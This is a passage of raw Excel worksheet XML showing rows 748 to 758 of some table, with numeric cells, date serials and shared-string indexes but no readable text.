        <v>10298</v>
      </c>
    </row>
    <row r="748" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A748">
        <v>2314</v>
      </c>
      <c r="B748" t="s">
        <v>5848</v>
      </c>
      <c r="C748" t="s">
        <v>215</v>
      </c>
      <c r="D748" t="s">
        <v>5849</v>
      </c>
      <c r="E748" t="s">
        <v>363</v>
      </c>
      <c r="F748" t="s">
        <v>5850</v>
      </c>
      <c r="G748" s="1">
        <v>43913</v>
      </c>
      <c r="H748">
        <v>2824</v>
      </c>
      <c r="I748">
        <v>2824</v>
      </c>
      <c r="J748">
        <v>0</v>
      </c>
      <c r="K748">
        <v>0</v>
      </c>
      <c r="L748">
        <v>0</v>
      </c>
      <c r="M748">
        <v>0</v>
      </c>
      <c r="N748">
        <v>0</v>
      </c>
      <c r="O748">
        <v>0</v>
      </c>
      <c r="P748">
        <v>0</v>
      </c>
      <c r="Q748">
        <v>0</v>
      </c>
      <c r="R748">
        <v>1</v>
      </c>
      <c r="S748">
        <v>1</v>
      </c>
      <c r="T748">
        <v>1</v>
      </c>
      <c r="U748">
        <v>0</v>
      </c>
      <c r="V748">
        <v>0</v>
      </c>
      <c r="W748">
        <v>0</v>
      </c>
      <c r="X748">
        <v>0</v>
      </c>
      <c r="Y748">
        <v>0</v>
      </c>
      <c r="Z748">
        <v>0</v>
      </c>
      <c r="AA748">
        <v>0</v>
      </c>
      <c r="AB748">
        <v>0</v>
      </c>
      <c r="AC748">
        <v>100</v>
      </c>
      <c r="AD748">
        <v>1</v>
      </c>
      <c r="AE748">
        <v>1000</v>
      </c>
      <c r="AF748" t="s">
        <v>5851</v>
      </c>
      <c r="AG748">
        <v>33681</v>
      </c>
      <c r="AH748">
        <v>6</v>
      </c>
      <c r="AJ748">
        <v>144</v>
      </c>
      <c r="AK748" t="s">
        <v>5852</v>
      </c>
      <c r="AL748" t="s">
        <v>5853</v>
      </c>
      <c r="AM748" t="s">
        <v>5854</v>
      </c>
      <c r="AN748" t="s">
        <v>68</v>
      </c>
      <c r="AO748">
        <v>2012</v>
      </c>
      <c r="AP748" t="s">
        <v>5855</v>
      </c>
      <c r="AQ748" t="s">
        <v>5851</v>
      </c>
      <c r="AR748" t="s">
        <v>5851</v>
      </c>
      <c r="AS748" t="s">
        <v>71</v>
      </c>
      <c r="AT748" t="s">
        <v>72</v>
      </c>
      <c r="AU748">
        <v>15</v>
      </c>
      <c r="AV748">
        <v>1</v>
      </c>
      <c r="AW748">
        <v>0</v>
      </c>
      <c r="AX748">
        <v>6</v>
      </c>
      <c r="AY748">
        <v>1</v>
      </c>
      <c r="AZ748">
        <v>3</v>
      </c>
      <c r="BA748" t="s">
        <v>17130</v>
      </c>
      <c r="BB748" t="s">
        <v>15825</v>
      </c>
      <c r="BC748" t="s">
        <v>9852</v>
      </c>
      <c r="BD748">
        <v>0</v>
      </c>
    </row>
    <row r="749" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A749">
        <v>2107</v>
      </c>
      <c r="B749" t="s">
        <v>5856</v>
      </c>
      <c r="C749" t="s">
        <v>157</v>
      </c>
      <c r="D749" t="s">
        <v>5857</v>
      </c>
      <c r="E749" t="s">
        <v>49</v>
      </c>
      <c r="F749" t="s">
        <v>364</v>
      </c>
      <c r="G749" s="1">
        <v>43963</v>
      </c>
      <c r="H749">
        <v>2847</v>
      </c>
      <c r="I749">
        <v>2847</v>
      </c>
      <c r="J749">
        <v>0</v>
      </c>
      <c r="K749">
        <v>0</v>
      </c>
      <c r="L749">
        <v>0</v>
      </c>
      <c r="M749">
        <v>0</v>
      </c>
      <c r="N749">
        <v>0</v>
      </c>
      <c r="O749">
        <v>0</v>
      </c>
      <c r="P749">
        <v>0</v>
      </c>
      <c r="Q749">
        <v>12</v>
      </c>
      <c r="R749">
        <v>0</v>
      </c>
      <c r="S749">
        <v>0</v>
      </c>
      <c r="T749">
        <v>1</v>
      </c>
      <c r="U749">
        <v>0</v>
      </c>
      <c r="V749">
        <v>0</v>
      </c>
      <c r="W749">
        <v>0</v>
      </c>
      <c r="X749">
        <v>0</v>
      </c>
      <c r="Y749">
        <v>0</v>
      </c>
      <c r="Z749">
        <v>0</v>
      </c>
      <c r="AA749">
        <v>0</v>
      </c>
      <c r="AB749">
        <v>25000</v>
      </c>
      <c r="AC749">
        <v>0</v>
      </c>
      <c r="AD749">
        <v>0</v>
      </c>
      <c r="AE749">
        <v>100000</v>
      </c>
      <c r="AF749" t="s">
        <v>5858</v>
      </c>
      <c r="AG749">
        <v>68352</v>
      </c>
      <c r="AH749">
        <v>16</v>
      </c>
      <c r="AJ749">
        <v>239</v>
      </c>
      <c r="AK749" t="s">
        <v>4119</v>
      </c>
      <c r="AL749" t="s">
        <v>5859</v>
      </c>
      <c r="AM749" t="s">
        <v>5860</v>
      </c>
      <c r="AN749" t="s">
        <v>82</v>
      </c>
      <c r="AO749">
        <v>2012</v>
      </c>
      <c r="AP749">
        <v>317393716</v>
      </c>
      <c r="AQ749" t="s">
        <v>5861</v>
      </c>
      <c r="AR749" t="s">
        <v>5858</v>
      </c>
      <c r="AS749" t="s">
        <v>71</v>
      </c>
      <c r="AT749" t="s">
        <v>86</v>
      </c>
      <c r="AU749">
        <v>26</v>
      </c>
      <c r="AV749">
        <v>3</v>
      </c>
      <c r="AW749">
        <v>16</v>
      </c>
      <c r="AX749">
        <v>23</v>
      </c>
      <c r="AY749">
        <v>39</v>
      </c>
      <c r="AZ749">
        <v>7</v>
      </c>
      <c r="BA749" t="s">
        <v>17067</v>
      </c>
      <c r="BB749" t="s">
        <v>15704</v>
      </c>
      <c r="BC749">
        <v>0</v>
      </c>
      <c r="BD749" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="750" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A750">
        <v>2276</v>
      </c>
      <c r="B750" t="s">
        <v>5862</v>
      </c>
      <c r="C750" t="s">
        <v>129</v>
      </c>
      <c r="D750" t="s">
        <v>5383</v>
      </c>
      <c r="E750" t="s">
        <v>131</v>
      </c>
      <c r="F750" t="s">
        <v>3318</v>
      </c>
      <c r="G750" s="1">
        <v>43914</v>
      </c>
      <c r="H750">
        <v>2913</v>
      </c>
      <c r="I750">
        <v>2913</v>
      </c>
      <c r="J750">
        <v>0</v>
      </c>
      <c r="K750">
        <v>0</v>
      </c>
      <c r="L750">
        <v>0</v>
      </c>
      <c r="M750">
        <v>0</v>
      </c>
      <c r="N750">
        <v>0</v>
      </c>
      <c r="O750">
        <v>0</v>
      </c>
      <c r="P750">
        <v>0</v>
      </c>
      <c r="Q750">
        <v>0</v>
      </c>
      <c r="R750">
        <v>0</v>
      </c>
      <c r="S750">
        <v>0</v>
      </c>
      <c r="T750">
        <v>1</v>
      </c>
      <c r="U750">
        <v>0</v>
      </c>
      <c r="V750">
        <v>0</v>
      </c>
      <c r="W750">
        <v>0</v>
      </c>
      <c r="X750">
        <v>0</v>
      </c>
      <c r="Y750">
        <v>0</v>
      </c>
      <c r="Z750">
        <v>0</v>
      </c>
      <c r="AA750">
        <v>0</v>
      </c>
      <c r="AB750">
        <v>0</v>
      </c>
      <c r="AC750">
        <v>0</v>
      </c>
      <c r="AD750">
        <v>0</v>
      </c>
      <c r="AE750">
        <v>200000</v>
      </c>
      <c r="AF750" t="s">
        <v>5384</v>
      </c>
      <c r="AG750">
        <v>15314</v>
      </c>
      <c r="AH750">
        <v>11</v>
      </c>
      <c r="AJ750">
        <v>273</v>
      </c>
      <c r="AK750" t="s">
        <v>3443</v>
      </c>
      <c r="AL750" t="s">
        <v>3443</v>
      </c>
      <c r="AM750" t="s">
        <v>5863</v>
      </c>
      <c r="AN750" t="s">
        <v>55</v>
      </c>
      <c r="AO750">
        <v>2009</v>
      </c>
      <c r="AP750" t="s">
        <v>5386</v>
      </c>
      <c r="AQ750" t="s">
        <v>5864</v>
      </c>
      <c r="AR750" t="s">
        <v>5388</v>
      </c>
      <c r="AS750" t="s">
        <v>553</v>
      </c>
      <c r="AT750" t="s">
        <v>58</v>
      </c>
      <c r="AU750">
        <v>22</v>
      </c>
      <c r="AV750">
        <v>1</v>
      </c>
      <c r="AW750">
        <v>0</v>
      </c>
      <c r="AX750">
        <v>0</v>
      </c>
      <c r="AY750">
        <v>1</v>
      </c>
      <c r="AZ750">
        <v>5</v>
      </c>
      <c r="BA750" t="s">
        <v>17111</v>
      </c>
      <c r="BB750" t="s">
        <v>14565</v>
      </c>
      <c r="BC750">
        <v>0</v>
      </c>
      <c r="BD750">
        <v>0</v>
      </c>
    </row>
    <row r="751" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A751">
        <v>2616</v>
      </c>
      <c r="B751" t="s">
        <v>5865</v>
      </c>
      <c r="C751" t="s">
        <v>129</v>
      </c>
      <c r="D751" t="s">
        <v>5866</v>
      </c>
      <c r="E751" t="s">
        <v>300</v>
      </c>
      <c r="F751" t="s">
        <v>5867</v>
      </c>
      <c r="G751" s="1">
        <v>43966</v>
      </c>
      <c r="H751">
        <v>2959</v>
      </c>
      <c r="I751">
        <v>2959</v>
      </c>
      <c r="J751">
        <v>1</v>
      </c>
      <c r="K751">
        <v>0</v>
      </c>
      <c r="L751">
        <v>0</v>
      </c>
      <c r="M751">
        <v>0</v>
      </c>
      <c r="N751">
        <v>0</v>
      </c>
      <c r="O751">
        <v>0</v>
      </c>
      <c r="P751">
        <v>0</v>
      </c>
      <c r="Q751">
        <v>0</v>
      </c>
      <c r="R751">
        <v>0</v>
      </c>
      <c r="S751">
        <v>0</v>
      </c>
      <c r="T751">
        <v>0</v>
      </c>
      <c r="U751">
        <v>200000</v>
      </c>
      <c r="V751">
        <v>0</v>
      </c>
      <c r="W751">
        <v>0</v>
      </c>
      <c r="X751">
        <v>0</v>
      </c>
      <c r="Y751">
        <v>0</v>
      </c>
      <c r="Z751">
        <v>0</v>
      </c>
      <c r="AA751">
        <v>0</v>
      </c>
      <c r="AB751">
        <v>0</v>
      </c>
      <c r="AC751">
        <v>0</v>
      </c>
      <c r="AD751">
        <v>0</v>
      </c>
      <c r="AE751">
        <v>0</v>
      </c>
      <c r="AF751" t="s">
        <v>5868</v>
      </c>
      <c r="AG751">
        <v>15710</v>
      </c>
      <c r="AH751">
        <v>11</v>
      </c>
      <c r="AJ751">
        <v>268</v>
      </c>
      <c r="AK751" t="s">
        <v>277</v>
      </c>
      <c r="AL751" t="s">
        <v>278</v>
      </c>
      <c r="AM751" t="s">
        <v>5869</v>
      </c>
      <c r="AN751" t="s">
        <v>55</v>
      </c>
      <c r="AO751">
        <v>2010</v>
      </c>
      <c r="AP751" t="s">
        <v>5870</v>
      </c>
      <c r="AQ751" t="s">
        <v>5871</v>
      </c>
      <c r="AR751" t="s">
        <v>5872</v>
      </c>
      <c r="AS751" t="s">
        <v>179</v>
      </c>
      <c r="AT751" t="s">
        <v>58</v>
      </c>
      <c r="AU751">
        <v>25</v>
      </c>
      <c r="AV751">
        <v>1</v>
      </c>
      <c r="AW751">
        <v>0</v>
      </c>
      <c r="AX751">
        <v>0</v>
      </c>
      <c r="AY751">
        <v>3</v>
      </c>
      <c r="AZ751">
        <v>1</v>
      </c>
      <c r="BA751" t="s">
        <v>17208</v>
      </c>
      <c r="BB751">
        <v>0</v>
      </c>
      <c r="BC751" t="s">
        <v>10721</v>
      </c>
      <c r="BD751">
        <v>0</v>
      </c>
    </row>
    <row r="752" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A752">
        <v>2275</v>
      </c>
      <c r="B752" t="s">
        <v>5873</v>
      </c>
      <c r="C752" t="s">
        <v>458</v>
      </c>
      <c r="D752" t="s">
        <v>5874</v>
      </c>
      <c r="E752" t="s">
        <v>111</v>
      </c>
      <c r="F752" t="s">
        <v>5875</v>
      </c>
      <c r="G752" s="1">
        <v>44126</v>
      </c>
      <c r="H752">
        <v>3002</v>
      </c>
      <c r="I752">
        <v>3002</v>
      </c>
      <c r="J752">
        <v>1</v>
      </c>
      <c r="K752">
        <v>1</v>
      </c>
      <c r="L752">
        <v>1</v>
      </c>
      <c r="M752">
        <v>3</v>
      </c>
      <c r="N752">
        <v>0</v>
      </c>
      <c r="O752">
        <v>0</v>
      </c>
      <c r="P752">
        <v>0</v>
      </c>
      <c r="Q752">
        <v>1</v>
      </c>
      <c r="R752">
        <v>1</v>
      </c>
      <c r="S752">
        <v>0</v>
      </c>
      <c r="T752">
        <v>1</v>
      </c>
      <c r="U752">
        <v>150000</v>
      </c>
      <c r="V752">
        <v>50000</v>
      </c>
      <c r="W752">
        <v>5000</v>
      </c>
      <c r="X752">
        <v>4500</v>
      </c>
      <c r="Y752">
        <v>0</v>
      </c>
      <c r="Z752">
        <v>0</v>
      </c>
      <c r="AA752">
        <v>0</v>
      </c>
      <c r="AB752">
        <v>100</v>
      </c>
      <c r="AC752">
        <v>40000</v>
      </c>
      <c r="AD752">
        <v>0</v>
      </c>
      <c r="AE752">
        <v>2000</v>
      </c>
      <c r="AF752" t="s">
        <v>5876</v>
      </c>
      <c r="AG752">
        <v>0</v>
      </c>
      <c r="AH752">
        <v>5</v>
      </c>
      <c r="AJ752">
        <v>150</v>
      </c>
      <c r="AK752" t="s">
        <v>3800</v>
      </c>
      <c r="AL752" t="s">
        <v>5877</v>
      </c>
      <c r="AM752" t="s">
        <v>5878</v>
      </c>
      <c r="AN752" t="s">
        <v>55</v>
      </c>
      <c r="AO752">
        <v>2016</v>
      </c>
      <c r="AP752">
        <v>82385985995</v>
      </c>
      <c r="AQ752">
        <v>82385985995</v>
      </c>
      <c r="AR752" t="s">
        <v>5876</v>
      </c>
      <c r="AS752" t="s">
        <v>71</v>
      </c>
      <c r="AT752" t="s">
        <v>58</v>
      </c>
      <c r="AU752">
        <v>30</v>
      </c>
      <c r="AV752">
        <v>1</v>
      </c>
      <c r="AW752">
        <v>0</v>
      </c>
      <c r="AX752">
        <v>0</v>
      </c>
      <c r="AY752">
        <v>20</v>
      </c>
      <c r="AZ752">
        <v>1</v>
      </c>
      <c r="BA752" t="s">
        <v>17110</v>
      </c>
      <c r="BB752">
        <v>0</v>
      </c>
      <c r="BC752" t="s">
        <v>9660</v>
      </c>
      <c r="BD752" t="s">
        <v>9624</v>
      </c>
    </row>
    <row r="753" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A753">
        <v>2250</v>
      </c>
      <c r="B753" t="s">
        <v>5879</v>
      </c>
      <c r="C753" t="s">
        <v>4653</v>
      </c>
      <c r="D753" t="s">
        <v>5880</v>
      </c>
      <c r="E753" t="s">
        <v>1312</v>
      </c>
      <c r="F753" t="s">
        <v>5881</v>
      </c>
      <c r="G753" s="1">
        <v>44272</v>
      </c>
      <c r="H753">
        <v>3020</v>
      </c>
      <c r="I753">
        <v>3020</v>
      </c>
      <c r="J753">
        <v>0</v>
      </c>
      <c r="K753">
        <v>0</v>
      </c>
      <c r="L753">
        <v>0</v>
      </c>
      <c r="M753">
        <v>0</v>
      </c>
      <c r="N753">
        <v>0</v>
      </c>
      <c r="O753">
        <v>0</v>
      </c>
      <c r="P753">
        <v>0</v>
      </c>
      <c r="Q753">
        <v>1</v>
      </c>
      <c r="R753">
        <v>1</v>
      </c>
      <c r="S753">
        <v>0</v>
      </c>
      <c r="T753">
        <v>0</v>
      </c>
      <c r="U753">
        <v>0</v>
      </c>
      <c r="V753">
        <v>0</v>
      </c>
      <c r="W753">
        <v>0</v>
      </c>
      <c r="X753">
        <v>0</v>
      </c>
      <c r="Y753">
        <v>0</v>
      </c>
      <c r="Z753">
        <v>0</v>
      </c>
      <c r="AA753">
        <v>0</v>
      </c>
      <c r="AB753">
        <v>5</v>
      </c>
      <c r="AC753">
        <v>1000</v>
      </c>
      <c r="AD753">
        <v>0</v>
      </c>
      <c r="AE753">
        <v>0</v>
      </c>
      <c r="AF753" t="s">
        <v>5882</v>
      </c>
      <c r="AG753">
        <v>36764</v>
      </c>
      <c r="AH753">
        <v>7</v>
      </c>
      <c r="AJ753">
        <v>93</v>
      </c>
      <c r="AK753" t="s">
        <v>5883</v>
      </c>
      <c r="AL753" t="s">
        <v>2385</v>
      </c>
      <c r="AM753" t="s">
        <v>5884</v>
      </c>
      <c r="AN753" t="s">
        <v>68</v>
      </c>
      <c r="AO753">
        <v>2016</v>
      </c>
      <c r="AP753">
        <v>85366662366</v>
      </c>
      <c r="AQ753" t="s">
        <v>5885</v>
      </c>
      <c r="AR753" t="s">
        <v>5882</v>
      </c>
      <c r="AS753" t="s">
        <v>71</v>
      </c>
      <c r="AT753" t="s">
        <v>72</v>
      </c>
      <c r="AU753">
        <v>6</v>
      </c>
      <c r="AV753">
        <v>1</v>
      </c>
      <c r="AW753">
        <v>0</v>
      </c>
      <c r="AX753">
        <v>0</v>
      </c>
      <c r="AY753">
        <v>2</v>
      </c>
      <c r="AZ753">
        <v>12</v>
      </c>
      <c r="BA753" t="s">
        <v>17103</v>
      </c>
      <c r="BB753" t="s">
        <v>15789</v>
      </c>
      <c r="BC753" t="s">
        <v>10914</v>
      </c>
      <c r="BD753">
        <v>0</v>
      </c>
    </row>
    <row r="754" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A754">
        <v>2689</v>
      </c>
      <c r="B754" t="s">
        <v>5886</v>
      </c>
      <c r="C754" t="s">
        <v>318</v>
      </c>
      <c r="D754" t="s">
        <v>5887</v>
      </c>
      <c r="E754" t="s">
        <v>843</v>
      </c>
      <c r="F754" t="s">
        <v>859</v>
      </c>
      <c r="G754" s="1">
        <v>43951</v>
      </c>
      <c r="H754">
        <v>3028</v>
      </c>
      <c r="I754">
        <v>3028</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t="s">
        <v>5888</v>
      </c>
      <c r="AG754">
        <v>90225</v>
      </c>
      <c r="AH754">
        <v>26</v>
      </c>
      <c r="AJ754">
        <v>420</v>
      </c>
      <c r="AK754" t="s">
        <v>5889</v>
      </c>
      <c r="AL754" t="s">
        <v>5890</v>
      </c>
      <c r="AM754" t="s">
        <v>5891</v>
      </c>
      <c r="AN754" t="s">
        <v>55</v>
      </c>
      <c r="AO754">
        <v>2019</v>
      </c>
      <c r="AP754">
        <v>81281056747</v>
      </c>
      <c r="AQ754" t="s">
        <v>5892</v>
      </c>
      <c r="AR754" t="s">
        <v>5893</v>
      </c>
      <c r="AU754">
        <v>26</v>
      </c>
      <c r="AV754">
        <v>0</v>
      </c>
      <c r="AW754">
        <v>0</v>
      </c>
      <c r="AX754">
        <v>0</v>
      </c>
      <c r="AY754">
        <v>6</v>
      </c>
      <c r="AZ754">
        <v>0</v>
      </c>
      <c r="BA754" t="s">
        <v>17268</v>
      </c>
      <c r="BB754" t="s">
        <v>15900</v>
      </c>
      <c r="BC754" t="s">
        <v>10546</v>
      </c>
      <c r="BD754" t="s">
        <v>10751</v>
      </c>
    </row>
    <row r="755" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A755">
        <v>2658</v>
      </c>
      <c r="B755" t="s">
        <v>3873</v>
      </c>
      <c r="C755" t="s">
        <v>318</v>
      </c>
      <c r="D755" t="s">
        <v>5894</v>
      </c>
      <c r="E755" t="s">
        <v>843</v>
      </c>
      <c r="F755" t="s">
        <v>859</v>
      </c>
      <c r="G755" s="1">
        <v>44337</v>
      </c>
      <c r="H755">
        <v>3042</v>
      </c>
      <c r="I755">
        <v>3042</v>
      </c>
      <c r="J755">
        <v>0</v>
      </c>
      <c r="K755">
        <v>0</v>
      </c>
      <c r="L755">
        <v>0</v>
      </c>
      <c r="M755">
        <v>0</v>
      </c>
      <c r="N755">
        <v>0</v>
      </c>
      <c r="O755">
        <v>0</v>
      </c>
      <c r="P755">
        <v>0</v>
      </c>
      <c r="Q755">
        <v>0</v>
      </c>
      <c r="R755">
        <v>15</v>
      </c>
      <c r="S755">
        <v>1</v>
      </c>
      <c r="T755">
        <v>0</v>
      </c>
      <c r="U755">
        <v>0</v>
      </c>
      <c r="V755">
        <v>0</v>
      </c>
      <c r="W755">
        <v>0</v>
      </c>
      <c r="X755">
        <v>0</v>
      </c>
      <c r="Y755">
        <v>0</v>
      </c>
      <c r="Z755">
        <v>0</v>
      </c>
      <c r="AA755">
        <v>0</v>
      </c>
      <c r="AB755">
        <v>0</v>
      </c>
      <c r="AC755">
        <v>800</v>
      </c>
      <c r="AD755">
        <v>1</v>
      </c>
      <c r="AE755">
        <v>0</v>
      </c>
      <c r="AF755" t="s">
        <v>5895</v>
      </c>
      <c r="AG755">
        <v>90552</v>
      </c>
      <c r="AH755">
        <v>26</v>
      </c>
      <c r="AJ755">
        <v>406</v>
      </c>
      <c r="AK755" t="s">
        <v>2393</v>
      </c>
      <c r="AL755" t="s">
        <v>5896</v>
      </c>
      <c r="AM755" t="s">
        <v>5897</v>
      </c>
      <c r="AN755" t="s">
        <v>55</v>
      </c>
      <c r="AO755">
        <v>2017</v>
      </c>
      <c r="AP755">
        <v>82311662020</v>
      </c>
      <c r="AQ755" t="s">
        <v>5898</v>
      </c>
      <c r="AR755" t="s">
        <v>5895</v>
      </c>
      <c r="AS755" t="s">
        <v>71</v>
      </c>
      <c r="AT755" t="s">
        <v>58</v>
      </c>
      <c r="AU755">
        <v>30</v>
      </c>
      <c r="AV755">
        <v>0</v>
      </c>
      <c r="AW755">
        <v>0</v>
      </c>
      <c r="AX755">
        <v>0</v>
      </c>
      <c r="AY755">
        <v>6</v>
      </c>
      <c r="AZ755">
        <v>3</v>
      </c>
      <c r="BA755" t="s">
        <v>17247</v>
      </c>
      <c r="BB755" t="s">
        <v>15899</v>
      </c>
      <c r="BC755" t="s">
        <v>10546</v>
      </c>
      <c r="BD755" t="s">
        <v>10668</v>
      </c>
    </row>
    <row r="756" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A756">
        <v>2685</v>
      </c>
      <c r="B756" t="s">
        <v>5899</v>
      </c>
      <c r="C756" t="s">
        <v>2060</v>
      </c>
      <c r="D756" t="s">
        <v>5900</v>
      </c>
      <c r="E756" t="s">
        <v>142</v>
      </c>
      <c r="F756" t="s">
        <v>5901</v>
      </c>
      <c r="G756" s="1">
        <v>44001</v>
      </c>
      <c r="H756">
        <v>3050</v>
      </c>
      <c r="I756">
        <v>3050</v>
      </c>
      <c r="J756">
        <v>2</v>
      </c>
      <c r="K756">
        <v>2</v>
      </c>
      <c r="L756">
        <v>2</v>
      </c>
      <c r="M756">
        <v>0</v>
      </c>
      <c r="N756">
        <v>0</v>
      </c>
      <c r="O756">
        <v>0</v>
      </c>
      <c r="P756">
        <v>0</v>
      </c>
      <c r="Q756">
        <v>3</v>
      </c>
      <c r="R756">
        <v>1</v>
      </c>
      <c r="S756">
        <v>0</v>
      </c>
      <c r="T756">
        <v>1</v>
      </c>
      <c r="U756">
        <v>30000</v>
      </c>
      <c r="V756">
        <v>3000</v>
      </c>
      <c r="W756">
        <v>3000</v>
      </c>
      <c r="X756">
        <v>0</v>
      </c>
      <c r="Y756">
        <v>0</v>
      </c>
      <c r="Z756">
        <v>0</v>
      </c>
      <c r="AA756">
        <v>0</v>
      </c>
      <c r="AB756">
        <v>500</v>
      </c>
      <c r="AC756">
        <v>500</v>
      </c>
      <c r="AD756">
        <v>0</v>
      </c>
      <c r="AE756">
        <v>5000</v>
      </c>
      <c r="AF756" t="s">
        <v>5902</v>
      </c>
      <c r="AG756">
        <v>96133</v>
      </c>
      <c r="AH756">
        <v>25</v>
      </c>
      <c r="AJ756">
        <v>445</v>
      </c>
      <c r="AK756" t="s">
        <v>5903</v>
      </c>
      <c r="AL756" t="s">
        <v>5904</v>
      </c>
      <c r="AM756" t="s">
        <v>5905</v>
      </c>
      <c r="AN756" t="s">
        <v>55</v>
      </c>
      <c r="AO756">
        <v>2016</v>
      </c>
      <c r="AP756">
        <v>8124464481</v>
      </c>
      <c r="AQ756" t="s">
        <v>5906</v>
      </c>
      <c r="AR756" t="s">
        <v>5907</v>
      </c>
      <c r="AS756" t="s">
        <v>71</v>
      </c>
      <c r="AT756" t="s">
        <v>58</v>
      </c>
      <c r="AU756">
        <v>0</v>
      </c>
      <c r="AV756">
        <v>0</v>
      </c>
      <c r="AW756">
        <v>0</v>
      </c>
      <c r="AX756">
        <v>0</v>
      </c>
      <c r="AY756">
        <v>8</v>
      </c>
      <c r="AZ756">
        <v>9</v>
      </c>
      <c r="BA756" t="s">
        <v>17265</v>
      </c>
      <c r="BB756" t="s">
        <v>15903</v>
      </c>
      <c r="BC756" t="s">
        <v>9550</v>
      </c>
      <c r="BD756">
        <v>0</v>
      </c>
    </row>
    <row r="757" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A757">
        <v>2253</v>
      </c>
      <c r="B757" t="s">
        <v>2612</v>
      </c>
      <c r="C757" t="s">
        <v>157</v>
      </c>
      <c r="D757" t="s">
        <v>5908</v>
      </c>
      <c r="E757" t="s">
        <v>5909</v>
      </c>
      <c r="F757" t="s">
        <v>5910</v>
      </c>
      <c r="G757" s="1">
        <v>43965</v>
      </c>
      <c r="H757">
        <v>3064</v>
      </c>
      <c r="I757">
        <v>3064</v>
      </c>
      <c r="J757">
        <v>1</v>
      </c>
      <c r="K757">
        <v>1</v>
      </c>
      <c r="L757">
        <v>0</v>
      </c>
      <c r="M757">
        <v>0</v>
      </c>
      <c r="N757">
        <v>2000</v>
      </c>
      <c r="O757">
        <v>0</v>
      </c>
      <c r="P757">
        <v>1</v>
      </c>
      <c r="Q757">
        <v>2</v>
      </c>
      <c r="R757">
        <v>0</v>
      </c>
      <c r="S757">
        <v>0</v>
      </c>
      <c r="T757">
        <v>1</v>
      </c>
      <c r="U757">
        <v>30000</v>
      </c>
      <c r="V757">
        <v>10000</v>
      </c>
      <c r="W757">
        <v>0</v>
      </c>
      <c r="X757">
        <v>0</v>
      </c>
      <c r="Y757">
        <v>0</v>
      </c>
      <c r="Z757">
        <v>0</v>
      </c>
      <c r="AA757">
        <v>0</v>
      </c>
      <c r="AB757">
        <v>1000</v>
      </c>
      <c r="AC757">
        <v>0</v>
      </c>
      <c r="AD757">
        <v>0</v>
      </c>
      <c r="AE757">
        <v>30000</v>
      </c>
      <c r="AF757" t="s">
        <v>5911</v>
      </c>
      <c r="AG757">
        <v>67181</v>
      </c>
      <c r="AH757">
        <v>16</v>
      </c>
      <c r="AJ757">
        <v>241</v>
      </c>
      <c r="AK757" t="s">
        <v>5912</v>
      </c>
      <c r="AL757" t="s">
        <v>5913</v>
      </c>
      <c r="AM757" t="s">
        <v>5914</v>
      </c>
      <c r="AN757" t="s">
        <v>82</v>
      </c>
      <c r="AO757">
        <v>1999</v>
      </c>
      <c r="AP757" t="s">
        <v>5915</v>
      </c>
      <c r="AQ757" t="s">
        <v>5916</v>
      </c>
      <c r="AR757" t="s">
        <v>5917</v>
      </c>
      <c r="AS757" t="s">
        <v>71</v>
      </c>
      <c r="AT757" t="s">
        <v>86</v>
      </c>
      <c r="AU757">
        <v>20</v>
      </c>
      <c r="AV757">
        <v>1</v>
      </c>
      <c r="AW757">
        <v>60</v>
      </c>
      <c r="AX757">
        <v>281</v>
      </c>
      <c r="AY757">
        <v>46</v>
      </c>
      <c r="AZ757">
        <v>49</v>
      </c>
      <c r="BA757" t="s">
        <v>16714</v>
      </c>
      <c r="BB757" t="s">
        <v>15792</v>
      </c>
      <c r="BC757">
        <v>0</v>
      </c>
      <c r="BD757" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="758" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A758">
        <v>1764</v>
      </c>
      <c r="B758" t="s">
        <v>5918</v>
      </c>
      <c r="C758" t="s">
        <v>458</v>
      </c>
      <c r="D758" t="s">
        <v>5919</v>
      </c>
      <c r="E758" t="s">
        <v>142</v>
      </c>
      <c r="F758" t="s">
        <v>5920</v>
      </c>
      <c r="G758" s="1">
        <v>43943</v>
      </c>
      <c r="H758">
        <v>3103</v>
      </c>
      <c r="I758">
        <v>3103</v>
      </c>
      <c r="J758">
        <v>2</v>
      </c>
      <c r="K758">
        <v>1</v>
      </c>
      <c r="L758">
        <v>1</v>
      </c>
      <c r="M758">
        <v>0</v>
      </c>
      <c r="N758">
        <v>0</v>
      </c>
      <c r="O758">
        <v>0</v>
      </c>
      <c r="P758">
        <v>0</v>
      </c>
      <c r="Q758">
        <v>1</v>
      </c>
      <c r="R758">
        <v>1</v>
      </c>
      <c r="S758">
        <v>0</v>
      </c>
      <c r="T758">
        <v>0</v>
      </c>
      <c r="U758">
        <v>200000</v>
      </c>
      <c r="V758">
        <v>100000</v>
      </c>
      <c r="W758">
        <v>100000</v>
      </c>
      <c r="X758">
        <v>0</v>
      </c>
      <c r="Y758">
        <v>0</v>
      </c>
      <c r="Z758">
        <v>0</v>
      </c>
      <c r="AA758">
        <v>0</v>
      </c>
      <c r="AB758">
        <v>100</v>
      </c>
      <c r="AC758">
        <v>100</v>
      </c>
      <c r="AD758">
        <v>0</v>
      </c>
      <c r="AE758">
        <v>0</v>
      </c>
      <c r="AF758" t="s">
        <v>5921</v>
      </c>
      <c r="AG758">
        <v>29464</v>
      </c>
      <c r="AH758">
        <v>5</v>
      </c>
      <c r="AJ758">
        <v>153</v>
      </c>
      <c r="AK758" t="s">
        <v>2427</v>
      </c>
      <c r="AL758" t="s">
        <v>5922</v>
      </c>
      <c r="AM758" t="s">
        <v>5923</v>
      </c>
      <c r="AN758" t="s">
        <v>55</v>
      </c>
      <c r="AO758">
        <v>2016</v>
      </c>
      <c r="AP758" t="s">
        <v>5924</v>
      </c>
      <c r="AQ758" t="s">
        <v>5925</v>
      </c>
      <c r="AR758" t="s">
        <v>5921</v>
      </c>
      <c r="AS758" t="s">
        <v>71</v>
      </c>
      <c r="AT758" t="s">
        <v>58</v>
      </c>
      <c r="AU758">
        <v>25</v>
      </c>
      <c r="AV758">
        <v>1</v>
      </c>
      <c r="AW758">
        <v>0</v>
      </c>
      <c r="AX758">
